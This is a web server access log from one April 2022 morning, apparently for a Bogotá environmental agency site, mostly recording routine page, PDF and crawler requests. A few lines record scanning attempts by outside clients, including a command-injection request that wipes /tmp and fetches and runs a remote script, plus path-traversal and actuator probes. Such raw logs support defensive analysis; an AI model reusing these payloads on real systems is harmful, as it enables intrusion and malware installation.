172.22.2.4 - - [24/Apr/2022:02:34:19 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [24/Apr/2022:02:34:19 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [24/Apr/2022:02:34:19 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [24/Apr/2022:02:34:20 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [24/Apr/2022:02:34:20 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [24/Apr/2022:02:34:20 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [24/Apr/2022:02:34:20 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [24/Apr/2022:02:34:20 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [24/Apr/2022:02:34:20 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [24/Apr/2022:02:33:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 40907
172.22.2.4 - - [24/Apr/2022:02:35:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [24/Apr/2022:02:37:51 -0500] "HEAD / HTTP/1.1" 200 -
197.234.37.162 - - [24/Apr/2022:02:38:14 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [24/Apr/2022:02:36:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55089
216.245.221.92 - - [24/Apr/2022:02:42:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Apr/2022:02:42:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44095
172.22.2.4 - - [24/Apr/2022:02:41:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [24/Apr/2022:02:43:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45787
172.22.2.4 - - [24/Apr/2022:02:42:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60486
207.46.13.115 - - [24/Apr/2022:02:46:28 -0500] "GET /Publicaciones/2022EE28585.pdf HTTP/1.1" 404 227
216.245.221.92 - - [24/Apr/2022:02:47:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:02:47:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:02:48:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
41.47.196.159 - - [24/Apr/2022:02:52:29 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+jx.qingdaosheng.com/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
216.245.221.92 - - [24/Apr/2022:02:52:51 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [24/Apr/2022:02:53:31 -0500] "-" 408 -
151.139.51.38 - - [24/Apr/2022:02:54:05 -0500] "GET /secretaria-de-ambiente-libero-a-33-animales-silvestres-en-el-humedal-la-conejera.html HTTP/1.0" 200 1095
172.22.2.4 - - [24/Apr/2022:02:53:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:02:54:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
176.67.101.1 - - [24/Apr/2022:02:57:50 -0500] "GET / HTTP/1.1" 200 319
176.67.101.1 - - [24/Apr/2022:02:57:50 -0500] "GET / HTTP/1.1" 200 319
176.67.101.1 - - [24/Apr/2022:02:57:50 -0500] "GET / HTTP/1.1" 200 319
176.67.101.1 - - [24/Apr/2022:02:57:50 -0500] "GET / HTTP/1.1" 200 319
176.67.101.1 - - [24/Apr/2022:02:57:50 -0500] "GET / HTTP/1.1" 200 319
176.67.101.1 - - [24/Apr/2022:02:57:50 -0500] "GET / HTTP/1.1" 200 319
176.67.101.1 - - [24/Apr/2022:02:57:50 -0500] "GET / HTTP/1.1" 200 319
176.67.101.1 - - [24/Apr/2022:02:57:50 -0500] "GET / HTTP/1.1" 200 319
176.67.101.1 - - [24/Apr/2022:02:57:50 -0500] "GET / HTTP/1.1" 200 319
176.67.101.1 - - [24/Apr/2022:02:57:50 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [24/Apr/2022:02:57:51 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [24/Apr/2022:03:00:03 -0500] "-" 408 -
172.22.2.4 - - [24/Apr/2022:02:59:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:02:59:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55450
216.245.221.92 - - [24/Apr/2022:03:02:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:03:04:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:03:05:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
216.245.221.92 - - [24/Apr/2022:03:07:51 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [24/Apr/2022:03:11:25 -0500] "-" 408 -
172.22.2.4 - - [24/Apr/2022:03:10:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [24/Apr/2022:03:12:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:03:11:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58006
172.22.2.4 - - [24/Apr/2022:03:17:12 -0500] "GET /BLA/boletinlegal/actuator/gateway/routes HTTP/1.1" 404 1018
216.245.221.92 - - [24/Apr/2022:03:17:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:03:16:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.65.13 - - [24/Apr/2022:03:18:26 -0500] "-" 408 -
172.22.2.4 - - [24/Apr/2022:03:17:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
207.46.13.196 - - [24/Apr/2022:03:22:10 -0500] "GET /Publicaciones/2022EE27456.pdf HTTP/1.1" 404 227
34.141.189.230 - - [24/Apr/2022:03:22:37 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [24/Apr/2022:03:22:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Apr/2022:03:22:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43961
201.245.192.253 - - [24/Apr/2022:03:23:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45778
172.22.2.4 - - [24/Apr/2022:03:22:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.65.13 - - [24/Apr/2022:03:24:36 -0500] "-" 408 -
172.22.2.4 - - [24/Apr/2022:03:23:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57542
216.245.221.92 - - [24/Apr/2022:03:27:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:03:28:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:03:29:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
66.249.65.13 - - [24/Apr/2022:03:30:50 -0500] "-" 408 -
172.22.2.4 - - [24/Apr/2022:03:31:39 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%207%20del%2008%20de%20Agosto%20de%202012.pdf HTTP/1.1" 304 -
216.245.221.92 - - [24/Apr/2022:03:32:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Apr/2022:03:32:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43961
172.22.2.4 - - [24/Apr/2022:03:33:08 -0500] "GET /BLA/boletinlegal/Directivas/2018/Directiva%20No.%2024%20del%2027%20de%20diciembre%20de%202018.pdf HTTP/1.1" 200 575948
201.245.192.253 - - [24/Apr/2022:03:33:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45778
172.22.2.4 - - [24/Apr/2022:03:34:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:03:34:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56300
66.249.65.13 - - [24/Apr/2022:03:36:35 -0500] "-" 408 -
172.22.2.4 - - [24/Apr/2022:03:36:47 -0500] "GET /BLA/boletinlegal/conceptos.php HTTP/1.1" 200 7443
172.22.2.4 - - [24/Apr/2022:03:36:57 -0500] "GET /BLA/boletinlegal/js/ajax_conceptos.js HTTP/1.1" 200 1326
17.121.115.246 - - [24/Apr/2022:03:37:24 -0500] "-" 408 -
216.245.221.92 - - [24/Apr/2022:03:37:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:03:41:23 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9559
172.22.2.4 - - [24/Apr/2022:03:39:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:03:41:56 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
66.249.65.13 - - [24/Apr/2022:03:42:24 -0500] "-" 408 -
172.22.2.4 - - [24/Apr/2022:03:40:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55877
216.245.221.92 - - [24/Apr/2022:03:42:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Apr/2022:03:42:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43961
201.245.192.253 - - [24/Apr/2022:03:43:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45778
172.22.2.4 - - [24/Apr/2022:03:45:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [24/Apr/2022:03:47:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:03:46:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55877
172.22.2.4 - - [24/Apr/2022:03:47:40 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 61796
172.22.2.4 - - [24/Apr/2022:03:49:36 -0500] "GET /BLA/boletinlegal/js/jquery.scrollTo-min.js HTTP/1.1" 200 1150
66.249.65.13 - - [24/Apr/2022:03:49:36 -0500] "-" 408 -
172.22.2.4 - - [24/Apr/2022:03:49:38 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
207.46.13.82 - - [24/Apr/2022:03:50:38 -0500] "GET /Publicaciones/2022EE20500.pdf HTTP/1.1" 404 227
40.77.167.29 - - [24/Apr/2022:03:51:24 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [24/Apr/2022:03:51:53 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1037
172.22.2.4 - - [24/Apr/2022:03:51:53 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1037
172.22.2.4 - - [24/Apr/2022:03:50:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60486
216.245.221.92 - - [24/Apr/2022:03:52:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:03:51:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:03:52:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
66.249.65.13 - - [24/Apr/2022:03:55:18 -0500] "-" 408 -
107.22.63.209 - - [24/Apr/2022:03:55:25 -0500] "GET /secretaria-de-ambiente-libero-a-33-animales-silvestres-en-el-humedal-la-conejera.html HTTP/1.1" 200 1095
69.63.189.3 - - [24/Apr/2022:03:57:47 -0500] "GET /images/acopiadores-llantas-control-2-abril.jpeg HTTP/1.1" 200 34334
173.252.107.19 - - [24/Apr/2022:03:57:49 -0500] "GET /images/culebra-sabanera-bogota-26-marzo.jpg HTTP/1.1" 200 22555
216.245.221.92 - - [24/Apr/2022:03:57:51 -0500] "HEAD / HTTP/1.1" 200 -
69.171.251.4 - - [24/Apr/2022:03:57:52 -0500] "GET /images/jornada-llantaton-usaquen-bosa-25-marzo.jpg HTTP/1.1" 200 60391
172.22.2.4 - - [24/Apr/2022:03:57:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:03:59:35 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2012%20del%2028%20de%20Agosto%20de%202012.pdf HTTP/1.1" 200 369945
172.22.2.4 - - [24/Apr/2022:03:58:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
66.249.65.13 - - [24/Apr/2022:04:02:39 -0500] "-" 408 -
216.245.221.92 - - [24/Apr/2022:04:02:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:04:03:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:04:04:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
216.245.221.92 - - [24/Apr/2022:04:07:51 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.132 - - [24/Apr/2022:04:08:39 -0500] "-" 408 -
66.249.65.13 - - [24/Apr/2022:04:08:52 -0500] "-" 408 -
172.22.2.4 - - [24/Apr/2022:04:09:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:04:09:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56669
216.245.221.92 - - [24/Apr/2022:04:12:51 -0500] "HEAD / HTTP/1.1" 200 -
69.171.251.8 - - [24/Apr/2022:04:14:11 -0500] "GET /images/liberacion-fauna-silvestre-23-abril.jpg HTTP/1.1" 200 52551
66.249.65.13 - - [24/Apr/2022:04:14:38 -0500] "-" 408 -
172.22.2.4 - - [24/Apr/2022:04:14:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:04:15:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
216.245.221.92 - - [24/Apr/2022:04:17:51 -0500] "HEAD / HTTP/1.1" 200 -
85.14.55.56 - - [24/Apr/2022:04:20:07 -0500] "GET / HTTP/1.1" 200 319
66.249.65.13 - - [24/Apr/2022:04:20:50 -0500] "-" 408 -
172.22.2.4 - - [24/Apr/2022:04:20:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [24/Apr/2022:04:22:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Apr/2022:04:22:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43932
172.22.2.4 - - [24/Apr/2022:04:21:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
201.245.192.253 - - [24/Apr/2022:04:23:07 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45785
40.77.167.29 - - [24/Apr/2022:04:24:57 -0500] "GET /Publicaciones/2022EE29053.pdf HTTP/1.1" 404 227
79.110.73.145 - - [24/Apr/2022:04:26:27 -0500] "GET /bla/resoluciones/resoluciones%202022/0313.pdf HTTP/1.1" 200 392814
66.249.65.13 - - [24/Apr/2022:04:26:54 -0500] "-" 408 -
207.46.13.79 - - [24/Apr/2022:04:27:21 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [24/Apr/2022:04:27:23 -0500] "GET /BLA/boletinlegal/Circulares/2019/Circular%2000018%20del%2020%20de%20noviembre%20de%202019.pdf HTTP/1.1" 304 -
216.245.221.92 - - [24/Apr/2022:04:27:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:04:26:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:04:27:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55450
216.245.221.92 - - [24/Apr/2022:04:32:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Apr/2022:04:32:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43932
201.245.192.253 - - [24/Apr/2022:04:33:05 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45785
172.22.2.4 - - [24/Apr/2022:04:32:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:04:33:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52945
216.245.221.92 - - [24/Apr/2022:04:37:51 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [24/Apr/2022:04:38:59 -0500] "-" 408 -
172.22.2.4 - - [24/Apr/2022:04:38:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:04:39:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
216.245.221.92 - - [24/Apr/2022:04:42:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Apr/2022:04:42:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43932
201.245.192.253 - - [24/Apr/2022:04:43:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45785
172.22.2.4 - - [24/Apr/2022:04:44:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
172.22.2.4 - - [24/Apr/2022:04:45:42 -0500] "GET /BLA/boletinlegal/remote/fgt_lang?lang=/../../../..//////////dev/ HTTP/1.1" 404 1018
172.22.2.4 - - [24/Apr/2022:04:44:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:04:44:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
199.59.150.182 - - [24/Apr/2022:04:47:12 -0500] "GET /documents/10184/2325415/pieza-concurso-buenas-practicas-20-septiembre.jpg HTTP/1.1" 404 1030
216.245.221.92 - - [24/Apr/2022:04:47:51 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.13 - - [24/Apr/2022:04:49:21 -0500] "-" 408 -
172.22.2.4 - - [24/Apr/2022:04:49:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:04:50:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52945
216.245.221.92 - - [24/Apr/2022:04:52:51 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.82 - - [24/Apr/2022:04:55:15 -0500] "GET /bla/resoluciones/resoluciones%202019/3332.pdf HTTP/1.1" 200 426680
172.22.2.4 - - [24/Apr/2022:04:55:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [24/Apr/2022:04:57:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:04:56:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55450
172.22.2.4 - - [24/Apr/2022:04:58:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 63729
216.245.221.92 - - [24/Apr/2022:05:02:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:05:01:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.65.13 - - [24/Apr/2022:05:03:26 -0500] "-" 408 -
172.22.2.4 - - [24/Apr/2022:05:02:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
172.22.2.4 - - [24/Apr/2022:05:07:19 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%2016%20del%2022%20de%20octubre%20de%202012.pdf HTTP/1.1" 304 -
216.245.221.92 - - [24/Apr/2022:05:07:51 -0500] "HEAD / HTTP/1.1" 200 -
69.171.251.113 - - [24/Apr/2022:05:08:24 -0500] "GET /secretaria-de-ambiente-libero-a-33-animales-silvestres-en-el-humedal-la-conejera.html?fbclid=IwAR14C2jmPh212wb5zwX-JdcQ6TCuK8I5fqpubcuTFCIxBZ5HpgRMBQnm1ak HTTP/1.1" 200 1095
172.22.2.4 - - [24/Apr/2022:05:07:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:05:08:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55877
216.245.221.92 - - [24/Apr/2022:05:12:51 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.115 - - [24/Apr/2022:05:13:32 -0500] "GET /Publicaciones/2022EE28585.pdf HTTP/1.1" 404 227
172.22.2.4 - - [24/Apr/2022:05:13:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:05:14:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54457
114.119.141.232 - - [24/Apr/2022:05:15:54 -0500] "-" 408 -
114.119.137.67 - - [24/Apr/2022:05:16:26 -0500] "-" 408 -
114.119.133.208 - - [24/Apr/2022:05:16:56 -0500] "-" 408 -
216.245.221.92 - - [24/Apr/2022:05:17:51 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.82 - - [24/Apr/2022:05:18:18 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12493
172.22.2.4 - - [24/Apr/2022:05:19:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:05:19:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
207.46.13.115 - - [24/Apr/2022:05:22:34 -0500] "GET /bla/resoluciones/notificaciones/autos%202020/3254.pdf HTTP/1.1" 200 355231
216.245.221.92 - - [24/Apr/2022:05:22:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Apr/2022:05:22:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44257
201.245.192.253 - - [24/Apr/2022:05:23:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45638
172.22.2.4 - - [24/Apr/2022:05:24:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:05:25:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
216.245.221.92 - - [24/Apr/2022:05:27:51 -0500] "HEAD / HTTP/1.1" 200 -
66.249.65.15 - - [24/Apr/2022:05:27:54 -0500] "-" 408 -
172.22.2.4 - - [24/Apr/2022:05:29:35 -0500] "GET /BLA/boletinlegal/Directivas/2011/Directiva%20No.%206%20del%208%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 304 -
172.22.2.4 - - [24/Apr/2022:05:30:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [24/Apr/2022:05:32:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Apr/2022:05:32:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44257
172.22.2.4 - - [24/Apr/2022:05:31:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59170
201.245.192.253 - - [24/Apr/2022:05:33:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45638
34.90.174.150 - - [24/Apr/2022:05:34:54 -0500] "GET / HTTP/1.1" 200 319
40.77.167.29 - - [24/Apr/2022:05:36:23 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/1461.pdf HTTP/1.1" 200 365965
216.245.221.92 - - [24/Apr/2022:05:37:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:05:36:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:05:37:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59688
216.245.221.92 - - [24/Apr/2022:05:42:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Apr/2022:05:42:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44257
201.245.192.253 - - [24/Apr/2022:05:43:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45638
172.22.2.4 - - [24/Apr/2022:05:42:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:05:43:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 50602
40.94.30.134 - - [24/Apr/2022:05:47:09 -0500] "GET /secretaria-de-ambiente-libero-a-33-animales-silvestres-en-el-humedal-la-conejera.html HTTP/1.1" 200 1095
216.245.221.92 - - [24/Apr/2022:05:47:51 -0500] "HEAD / HTTP/1.1" 200 -
199.59.150.181 - - [24/Apr/2022:05:48:23 -0500] "GET /con-pinceles-y-acuarelas-veronica-martinez-protege-la-biodiversidad.html HTTP/1.1" 200 990
199.59.150.180 - - [24/Apr/2022:05:48:24 -0500] "GET /images/cronica-mujer-biodiveridad-30-noviembre.jpg HTTP/1.1" 200 63270
172.22.2.4 - - [24/Apr/2022:05:48:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.145 - - [24/Apr/2022:05:49:58 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2012%2F HTTP/1.1" 200 270610
172.22.2.4 - - [24/Apr/2022:05:49:04 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56669
216.245.221.92 - - [24/Apr/2022:05:52:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:05:54:04 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:05:54:54 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58588
216.245.221.92 - - [24/Apr/2022:05:57:51 -0500] "HEAD / HTTP/1.1" 200 -
123.185.2.210 - - [24/Apr/2022:05:59:04 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [24/Apr/2022:05:59:54 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.82 - - [24/Apr/2022:06:01:41 -0500] "GET /SIIPEV/Diseno%20de%20Elementos%20de%20Mobiliario%20Urbano/Registros/RegistrosOtorgados.html HTTP/1.1" 200 728881
172.22.2.4 - - [24/Apr/2022:06:00:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 61416
216.245.221.92 - - [24/Apr/2022:06:02:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:06:05:05 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57044
172.22.2.4 - - [24/Apr/2022:06:06:55 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
66.249.65.13 - - [24/Apr/2022:06:07:24 -0500] "-" 408 -
172.22.2.4 - - [24/Apr/2022:06:05:44 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [24/Apr/2022:06:07:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:06:06:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55877
207.46.13.196 - - [24/Apr/2022:06:08:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4048.pdf HTTP/1.1" 304 -
207.46.13.188 - - [24/Apr/2022:06:11:47 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [24/Apr/2022:06:12:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:06:12:56 -0500] "GET /BLA/boletinlegal/xmlrpc.php HTTP/1.1" 404 1038
172.22.2.4 - - [24/Apr/2022:06:11:34 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:06:12:24 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55089
66.249.65.13 - - [24/Apr/2022:06:16:48 -0500] "-" 408 -
216.245.221.92 - - [24/Apr/2022:06:17:51 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:06:18:42 -0500] "GET /BLA/boletinlegal/sugerencias.php HTTP/1.1" 200 8615
172.22.2.4 - - [24/Apr/2022:06:17:24 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Apr/2022:06:18:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60932
172.22.2.4 - - [24/Apr/2022:06:20:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 63729
216.245.221.92 - - [24/Apr/2022:06:22:51 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Apr/2022:06:22:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44307
201.245.192.253 - - [24/Apr/2022:06:23:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45653
172.22.2.4 - - [24/Apr/2022:06:23:14 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
